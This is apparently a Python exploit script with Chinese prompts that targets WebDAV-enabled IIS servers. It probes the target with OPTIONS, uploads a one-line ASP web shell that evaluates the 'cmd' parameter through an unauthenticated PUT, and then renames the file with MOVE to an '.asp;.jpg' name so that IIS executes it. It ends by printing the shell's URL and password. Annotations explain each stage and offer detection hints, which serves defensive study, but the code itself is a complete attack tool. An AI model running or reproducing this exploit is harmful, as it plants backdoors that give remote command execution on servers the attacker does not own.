import requests
import time
# Start-up banner: an ASCII-art string with the author tag and version, printed once.
# It plays no part in the HTTP requests made further down.
# NOTE(review): the art contains backslash pairs such as "\_" and "\/" that are not
# valid escape sequences in a normal (non-raw) string; Python keeps them literally
# but newer interpreters warn about them.
author_info='''
__________________ _______ ______ _______ _______ _______
\__ __/\__ __/( ____ \ / ____ \ ( __ ) ( ____ \|\ /|( ____ )
) ( ) ( | ( \/( ( \/ | ( ) | | ( \/( \ / )| ( )|
| | | | | (_____ | (____ | | / | | (__ \ (_) / | (____)|
| | | | (_____ )| ___ \ | (/ /) | | __) ) _ ( | _____)
| | | | ) || ( ) ) | / | | | ( / ( ) \ | (
___) (______) (___/\____) |( (___) )_ | (__) | | (____/\( / \ )| )
\_______/\_______/\_______) \_____/(_)(_______) (_______/|/ \||/
By_Fright_Moch v1.0
'''
print(author_info)
# Read the target host and port interactively.
# Prompt text: "Enter the IP address without http, e.g. 127.0.0.1".
print("请输入ip地址去掉http,例如:127.0.0.1")
ip=input("ip地址:")
# Prompt text: "Enter the port, e.g. 8080".
print("请输入端口,例如:8080")
# Both values are used as typed: nothing validates them before they are
# interpolated into the request URLs and Host headers below.
port=input("端口:")
# File name for the written file: the current Unix time in whole seconds, as a string.
# Defender note: every file this script creates therefore has a purely numeric,
# epoch-like base name, which is easy to search for in a web root or access log.
filename = str(int(time.time()))
# Check whether the vulnerability is present (stage 1 of 3: probe).
# Sends a single OPTIONS request to an arbitrary path and looks only at the status code.
# NOTE(review): a 200 shows that the server answered OPTIONS and nothing more; the
# response headers are never inspected, so the "vulnerable" verdict below is a
# heuristic and can be reported for hosts on which write methods are disabled.
url = f"http://{ip}:{port}/111"
headers = {
    "Host": f"{ip}:{port}",
    "Content-Length": "0",
    "Connection": "close",
    "Max-Forwards": "10",
    "TE": "trailers"
}
# verify=False turns off TLS certificate verification; the scheme is hard-coded to
# http://, so no TLS is involved and the flag has no effect on this request.
response = requests.options(url, headers=headers, verify=False)
if response.status_code == 200:
    print("漏洞存在!")  # "Vulnerability present!"
else:
    print("漏洞不存在!")  # "Vulnerability not present!"
    exit()  # stop here; no write request is sent
# Upload the shell (stage 2 of 3: create a file with HTTP PUT).
# The file is written as "<epoch-seconds>.txt" at the root of the site, and the
# request carries no credentials.
url = f"http://{ip}:{port}/{filename}.txt"
headers = {
    "Host": f"{ip}:{port}",
    # Declared as form data although the body is script text.
    "Content-Type": "application/x-www-form-urlencoded",
    # Hard-coded; equals the byte length of the payload string below.
    "Content-Length": "25"
}
# Payload: a one-line classic-ASP script that evaluates whatever arrives in the
# request parameter "cmd", i.e. a web shell.
# Defender note: what this stage leaves behind is an unauthenticated PUT answered
# with 201 for a numerically named .txt file whose content starts with "<%".
# A site that does not need remote authoring should have WebDAV and write
# permission on the web root disabled, which makes this request fail.
data = '''<% eval request("cmd") %>'''
response = requests.put(url, headers=headers, data=data, verify=False)
# 201 Created is the only status treated as success.
if response.status_code == 201:
    print("上传成功!")  # "Upload succeeded!"
else:
    print("上传失败!")  # "Upload failed!"
    exit()  # stop before the rename stage
# Move the shell (stage 3 of 3: rename the uploaded file with the WebDAV MOVE method).
# The source is the .txt written in the previous stage; the Destination header
# renames it to "<epoch-seconds>.asp;.jpg".
# NOTE(review): that name matches the known IIS 6.0 behaviour of cutting the file
# name at ';' when choosing a handler, so the file is presumably run as ASP.
# The script never names its target product, so confirm before relying on this.
url = f"http://{ip}:{port}/{filename}.txt"
headers = {
    "Host": f"{ip}:{port}",
    "Destination": f"/{filename}.asp;.jpg",
    "Content-Length": "0",
    "Connection": "close"
}
# Same payload string as in the upload stage; it is passed again as the MOVE body.
data = '''<% eval request("cmd") %>'''
# requests has no helper for MOVE, so the generic request() call is used.
# Defender note: a MOVE request whose Destination contains ".asp;" is a
# high-signal entry in web-server logs, as is any file on disk with ';' in its name.
# Denying script execution in writable directories limits the impact.
response = requests.request("MOVE", url, headers=headers, verify=False,data=data)
# 201 is the only status treated as success.
if response.status_code == 201:
    # Prints the final URL and notes that the "password" is the parameter name cmd.
    print(f"shell地址:http://{ip}:{port}/{filename}.asp;.jpg密码为cmd")
else:
    print("移动失败!")  # "Move failed!"
    exit()
效果如下